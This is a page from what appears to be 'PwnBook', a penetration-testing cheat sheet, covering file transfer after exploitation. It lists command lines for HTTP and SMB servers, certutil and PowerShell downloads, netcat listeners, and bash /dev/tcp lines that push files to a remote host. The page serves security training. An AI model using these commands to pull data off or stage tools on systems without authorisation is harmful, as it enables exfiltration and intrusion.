👾
PwnBook
GitHub
👾
PwnBook
  • 👾Welcome
  • ENUMERATION & EXPLOITATION
    • Reconnaissance
    • Network Services
    • Web Vulnerabilities
      • Command Injection
      • CSRF (Cross Site Request Forgery)
      • File Inclusion
      • File Upload
      • Path Traversal
      • SQL Injection
      • XSS (Cross Site Scripting)
    • Active Directory
      • Capturing NTLM hashes
  • Post Exloitation
    • Reverse Shells
    • File Transfer
    • Privilege Escalation
      • Linux Privilege Escalation
      • Windows Privilege Escalation
    • Pivoting
Powered by GitBook
On this page
  • Integrity check
  • HTTP/PHP
  • HTTP Server
  • Download
  • SMB
  • SMB Server
  • Download
  • Netcat
  • Bash
  1. Post Exloitation

File Transfer

Integrity check

md5sum <file>
certutil -hashfile <file> md5

HTTP/PHP

HTTP Server

python3 -m http.server <port>
python2 -m SimpleHTTPServer <port>
php -S 0:<port>

Download

wget <url>
curl -s <url> -o <output>
(New-Object Net.WebClient).DownloadString('<url>') > <output>
certutil -urlcache -split -f <url> <output>

SMB

SMB Server

smbserver.py <share> $(pwd) -smb2support [-username user -password pass]

Download

smbclient -U 'user[%pass]' //<ip>/<share> -c "get <file> <output>"
# mount smb Share to drive
net use z: \\<ip>\<share> [/user:user pass]
# copy from share
copy \\<ip>\<share>\<file> <output>

Netcat

nc -nlvp <port> < <file>
nc -nlvp <port> > <output>

Bash

cat <file> > /dev/tcp/<ip>/<port>
cat < /dev/tcp/<target>/<port> > <output>

Last updated 9 months ago